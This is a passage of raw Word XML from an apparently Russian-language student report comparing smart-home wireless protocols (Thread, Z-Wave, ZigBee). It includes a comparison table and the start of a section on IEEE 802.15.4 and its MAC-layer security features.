            <w:proofErr w:type="spellEnd"/>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gridSpan w:val="2"/>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C07525" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="33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Нет, поддержку</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t> IP </w:t>
            </w:r>
            <w:r w:rsidRPr="00C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>имеет спецверсия</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t> ZigBee</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="333333"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w: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C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="00C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="175" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="00C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C799E">
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE7A4D" w:rsidRPr="00C07525" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="380"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506"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Thread</w:t>
            </w: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2,4 ГГц, может работать одновременно с</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t> Wi</w:t>
            </w:r>
            <w:r w:rsidRPr="00C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>Fi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1414"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Thread Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2276"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 xml:space="preserve">Может применяться в любых устройствах для умного дома. Особенно эффективен при </w:t>
            </w:r>
            <w:r w:rsidRPr="00C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>необходимости установки большого числа устройств и необходимости прямой</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>адресации по всему миру</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1795"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0C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="175" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="00C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C799E">
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE7A4D" w:rsidRPr="000C799E" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="206"/>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C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>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IEEE 802.15.4</w:t>
            </w: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252"/>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Ячеистая</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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112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Да</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>на</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>сетевом</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>уровне</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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C07525" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506"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Z-Wave</w:t>
            </w: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868,42 МГц (Европа), 869 МГц (Россия), может работать одновременно с</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>Wi</w:t>
            </w:r>
            <w:r w:rsidRPr="00C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>Fi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1414"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Z-Wave Alliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2276"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C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Может применяться в любых устройствах для умного дома. Особенно эффективен для небольших систем</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1795"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C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="333333"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="175" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="00C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C799E">
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE7A4D" w:rsidRPr="000C799E" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="130"/>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C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>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r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>ITU-T G.9959</w:t>
            </w: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189"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>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Ячеистая</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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single" w:sz="8" w:space="0" w:color="auto"/>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DE7A4D" w:rsidRPr="000C799E" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="378"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="000C799E" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="000C799E" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="333333"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>Да</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>на</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>прикладном</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>уровне</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>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nil"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="000C799E" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="000C799E" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="175" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="000C799E" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
            <w:r w:rsidRPr="000C799E">
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001626DF" w:rsidRPr="000C799E" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="378"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001626DF" w:rsidRPr="000C799E" w:rsidRDefault="001626DF" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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1626DF" w:rsidRPr="000C799E" w:rsidRDefault="001626DF" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001626DF" w:rsidRPr="000C799E" w:rsidRDefault="001626DF" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001626DF" w:rsidRPr="000C799E" w:rsidRDefault="001626DF" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001626DF" w:rsidRPr="000C799E" w:rsidRDefault="001626DF" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="175" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="001626DF" w:rsidRPr="000C799E" w:rsidRDefault="001626DF" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A66CA1" w:rsidRPr="000C799E" w:rsidRDefault="00A66CA1" w:rsidP="00A66CA1">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r>
        <w:t>1 -</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91A39">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>Сравнение протоколов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00235283" w:rsidRPr="00A66CA1" w:rsidRDefault="00235283" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003143D6" w:rsidRPr="000C799E" w:rsidRDefault="003143D6" w:rsidP="00C07525">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="28"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A3D41" w:rsidRPr="000C799E" w:rsidRDefault="00F57840" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc503990996"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="009A3D41" w:rsidRPr="000C799E">
        <w:t xml:space="preserve">РАССМОТРЕНИЕ </w:t>
      </w:r>
      <w:r w:rsidR="00806F99" w:rsidRPr="000C799E">
        <w:t xml:space="preserve">ОБЩЕГО УСТРОЙСТВА </w:t>
      </w:r>
      <w:r w:rsidR="009A3D41" w:rsidRPr="000C799E">
        <w:t xml:space="preserve">ПРОТОКОЛОВ </w:t>
      </w:r>
      <w:r w:rsidR="001626DF" w:rsidRPr="000C799E">
        <w:t>BLUETOOTH™</w:t>
      </w:r>
      <w:r w:rsidR="00806F99" w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> И</w:t>
      </w:r>
      <w:r w:rsidR="001626DF" w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> ZIGBEE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="001626DF" w:rsidRPr="000C799E" w:rsidRDefault="00F57840" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc503990997"/>
      <w:r>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidR="001626DF" w:rsidRPr="000C799E">
        <w:t>Протокол IEEE 802.15</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="001626DF" w:rsidRPr="000C799E" w:rsidRDefault="001626DF" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C07FB" w:rsidRPr="000C799E">
        <w:t>™, так</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C07FB" w:rsidRPr="000C799E">
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C07FB" w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> используют единый базовый радио стандарт IEEE 802.15.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001626DF" w:rsidRPr="000C799E" w:rsidRDefault="001626DF" w:rsidP="00F00A9D">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Цель стандарта IEEE 802.15 — предложить нижние слои основания сети для сетей типа беспроводных персональных сетей, ориентированных на низкую стоимость, низкую скорость повсеместной связи между устройствами (по контрасту с многими более конечно-ориентированных на пользователя сетями, как например </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>). Акцент делается на очень низкой стоимости связи с ближайшими устройствами, совсем без (или с небольшой) базовой структурой, с целью эксплуатации на доселе небывалом низком уровне энергии.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001626DF" w:rsidRPr="000C799E" w:rsidRDefault="001626DF" w:rsidP="00F00A9D">
      <w:r w:rsidRPr="000C799E">
        <w:t>Основной предел приёма определяется эквивалентной изотропно-излучаемой мощностью (ЭИИМ) радиоустройства со скоростью передачи 250 кбит/с. В России возможно использование радиоустройств без получения отдельных разрешений ГКРЧ на использование радиочастот</w:t>
      </w:r>
      <w:r w:rsidR="005C07FB" w:rsidRPr="000C799E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001626DF" w:rsidRPr="000C799E" w:rsidRDefault="001626DF" w:rsidP="00F00A9D">
      <w:r w:rsidRPr="000C799E">
        <w:t>Ещё более низкие скорости передачи могут быть рассмотрены с результирующим эффектом снижения энергопотребления. Как уже упоминалось, главной отличительной особенностью стандарта 802.15.4 среди беспроводных персональных сетей является низкая стоимость производства и расходов по эксплуатации, простота технологии.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001626DF" w:rsidRPr="000C799E" w:rsidRDefault="001626DF" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">В ряду важнейших функций находятся обеспечение работы в режиме реального времени посредством сохранения временных слотов, предотвращение одновременного доступа и комплексная поддержка защиты сетей. Устройства также включают функции управления расходом энергии, такие как качество соединений и детектирование энергии. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C07FB" w:rsidRPr="000C799E" w:rsidRDefault="005C07FB" w:rsidP="00F00A9D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Безопасность </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C07FB" w:rsidRPr="000C799E" w:rsidRDefault="005C07FB" w:rsidP="00F00A9D">
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>Что касается защиты связей, подуровень MAC предлагает возможности, которые могут быть использованы в верхних слоях для достижения желаемого уровня безопасности. Процессы в высших слоях могут определять ключи для выполнения симметричной криптографии для защиты нагрузки и ограничения её для групп устройств или просто для одноранговой связи, эти группы устройств могут быть описаны в списках контроля доступа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001626DF" w:rsidRPr="00F00A9D" w:rsidRDefault="005C07FB" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Кроме того, уровень MAC вычисляет давность проверки между последовательными приемов для предотвращения возможного выхода старых кадров, либо данных (которые больше не считается действительными) не выходят на более высокие слои. В дополнение к этому защищённому режиму защиты есть другой незащищённый режим MAC, который позволяет списки контроля доступа только в качестве средства для решения о принятии фрагментов в соответствии с их предполагаемым источником.</w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="00F00A9D">
        <w:t>[11]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C14C68" w:rsidRPr="000C799E" w:rsidRDefault="00C14C68" w:rsidP="00C07525"/>
    <w:p w:rsidR="005C07FB" w:rsidRPr="000C799E" w:rsidRDefault="00F57840" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
